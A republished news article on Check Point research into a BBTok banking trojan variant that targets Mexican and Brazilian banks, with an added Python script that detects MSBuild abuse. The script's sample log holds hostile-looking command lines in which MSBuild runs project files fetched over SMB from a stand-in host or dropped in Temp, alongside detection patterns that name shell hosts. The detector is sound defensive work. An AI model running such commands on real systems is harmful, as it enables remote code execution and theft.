New Variant of Banking Trojan BBTok Targets Over 40 Latin American Banks

By admin, September 22, 2023


Sep 22, 2023THNMalware / Cyber Threat

Banking Trojan BBTok

An active malware campaign targeting Latin America, particularly users in Brazil and Mexico, is distributing a new variant of a banking trojan called BBTok.

“The BBTok banker has a dedicated functionality that replicates the interfaces of more than 40 Mexican and Brazilian banks, and tricks the victims into entering their 2FA code to their bank accounts or into entering their payment card number,” Check Point said in research published this week.

The payloads are generated by a custom server-side PowerShell script and are unique for each victim based on the operating system and country, while being delivered via phishing emails that leverage a variety of file types.

BBTok is a Windows-based banking malware that first surfaced in 2020. It’s equipped with features that run the typical trojan gamut, allowing it to enumerate and kill processes, issue remote commands, manipulate the keyboard, and serve fake login pages for banks operating in the two countries.

The attack chains themselves are fairly straightforward, employing bogus links or ZIP file attachments to stealthily deploy the banker retrieved from a remote server (216.250.251[.]196) while displaying a decoy document to the victim.


But they are also diversified for Windows 7 and Windows 10 systems, mainly taking steps to evade newer detection mechanisms such as the Antimalware Scan Interface (AMSI), which lets applications such as PowerShell hand script content to the installed antivirus engine for inspection before it runs. AMSI is built into Windows 10 but absent from Windows 7, so those evasion steps only matter on the newer platform.

Two other key methods to fly under the radar are the use of living-off-the-land binaries (LOLBins) and geofencing checks to ensure that the targets are only from Brazil or Mexico before serving the malware via the PowerShell script.

Once launched, BBTok establishes connections with a remote server to receive commands to simulate the security verification pages for various banks.


In impersonating the interfaces of Latin American banks, the goal is to harvest credentials and authentication information entered by the users to conduct account takeovers of the online bank accounts.

“What’s notable is the operator’s cautious approach: all banking activities are only executed upon direct command from its C2 server, and are not automatically carried out on every infected system,” the company said.

Check Point’s analysis of the malware has revealed a significant improvement to its obfuscation and targeting since 2020, expanding beyond Mexican banks. The presence of Spanish and Portuguese language in the source code as well as in phishing emails offers a hint as to the attackers’ origin.

More than 150 users are estimated to have been infected by BBTok, based on an SQLite database found in the server hosting the payload generation component that records access to the malicious application.

The targeting and the language point to the threat actors likely operating out of Brazil, which continues to be the epicenter of potent financially motivated malware.


“Although BBTok has been able to remain under the radar due to its elusive techniques and targeting victims only in Mexico and Brazil, it’s evident that it is still actively deployed,” Check Point said.

“Due to its many capabilities, and its unique and creative delivery method involving LNK files, SMB and MSBuild, it still poses a danger to organizations and individuals in the region.”
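As an added example (not code from Check Point’s report or from the BBTok analysis), the following Python script shows one way a defender could hunt for the delivery pattern the quote describes: MSBuild.exe being abused as a living-off-the-land binary to execute a project file pulled from an SMB share or dropped in a user-writable directory, launched from a shell parent in the way a double-clicked LNK typically produces. The log records, the 198.51.100.7 address and the file names are constructed for illustration; the field layout (timestamp|ParentImage|Image|CommandLine) is an assumed simplification of a Sysmon Event ID 1 record, not a real export format.

```python
import ntpath
import re
from dataclasses import dataclass

# Constructed process-creation records in a simplified Sysmon Event ID 1 layout:
#   timestamp|ParentImage|Image|CommandLine
# Hosts, paths and the 198.51.100.7 address are made up for illustration.
SAMPLE_LOG = [
    # Benign: Visual Studio building a project from a normal source tree.
    r'2023-09-20T09:58:11Z|C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|MSBuild.exe "C:\src\app\app.csproj"',
    # Suspicious: cmd.exe (started from an LNK) runs MSBuild on a project fetched over SMB.
    r'2023-09-20T10:01:03Z|C:\Windows\System32\cmd.exe|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|MSBuild.exe \\198.51.100.7\share\build.xml',
    # Suspicious: PowerShell runs MSBuild on a project dropped in the user's Temp directory.
    r'2023-09-20T10:01:09Z|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe|MSBuild.exe /nologo "C:\Users\victim\AppData\Local\Temp\x.proj"',
    # Unrelated process; must not be flagged.
    r'2023-09-20T10:02:00Z|C:\Windows\explorer.exe|C:\Windows\System32\notepad.exe|notepad.exe invoice.txt',
]

# Parents that typically sit between an LNK double-click and the payload.
SHELL_PARENTS = {"explorer.exe", "cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
PROJECT_EXT = (".proj", ".csproj", ".vbproj", ".xml", ".targets")
UNC_PATH = re.compile(r'^\\\\[^\\\s"]+\\')                 # \\host\share\...
USER_WRITABLE = re.compile(r'\\(appdata|temp|tmp|downloads|public)\\', re.IGNORECASE)
TOKEN = re.compile(r'"[^"]*"|\S+')                          # keeps quoted paths whole


@dataclass
class Alert:
    ts: str
    rule: str
    detail: str


def _base(path: str) -> str:
    """Lower-cased file name of a Windows path (works on any host OS)."""
    return ntpath.basename(path).lower()


def project_files(cmdline: str) -> list[str]:
    """Return command-line tokens that look like MSBuild project files."""
    out = []
    for tok in TOKEN.findall(cmdline):
        tok = tok.strip('"')
        if tok.lower().endswith(PROJECT_EXT):
            out.append(tok)
    return out


def detect(records: list[str]) -> list[Alert]:
    """Flag MSBuild executions whose project source or parent process is suspicious."""
    alerts: list[Alert] = []
    for rec in records:
        rec = rec.strip()
        if not rec:
            continue
        ts, parent, image, cmdline = rec.split("|", 3)
        if _base(image) != "msbuild.exe":
            continue
        # Rule 1: project file sourced from an SMB share or a user-writable location.
        for proj in project_files(cmdline):
            if UNC_PATH.match(proj):
                alerts.append(Alert(ts, "msbuild_unc_project", proj))
            elif USER_WRITABLE.search(proj):
                alerts.append(Alert(ts, "msbuild_userdir_project", proj))
        # Rule 2: MSBuild spawned by a shell or script host rather than a build tool.
        if _base(parent) in SHELL_PARENTS:
            alerts.append(Alert(ts, "msbuild_shell_parent", _base(parent)))
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG):
        print(f"{a.ts} {a.rule}: {a.detail}")
```

Run against the constructed records, the devenv.exe build and the notepad launch produce nothing, while each of the two hostile lines raises two alerts (one for where the project came from, one for who launched MSBuild). On developer workstations, MSBuild launched from cmd.exe or PowerShell is routine, so in practice the parent-process rule should be scoped to non-developer hosts or combined with the UNC/user-directory rule before it pages anyone; the path rule alone is the higher-fidelity signal.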

The development comes as the Israeli cybersecurity company detailed a new large-scale phishing campaign that recently targeted over 40 prominent companies across multiple industries in Colombia with an ultimate aim to deploy the Remcos RAT via a multi-stage infection sequence.

“Remcos, a sophisticated ‘Swiss Army Knife’ RAT, grants attackers full control over the infected computer and can be used in a variety of attacks. Common consequences of a Remcos infection include data theft, follow-up infections, and account takeover,” Check Point said.
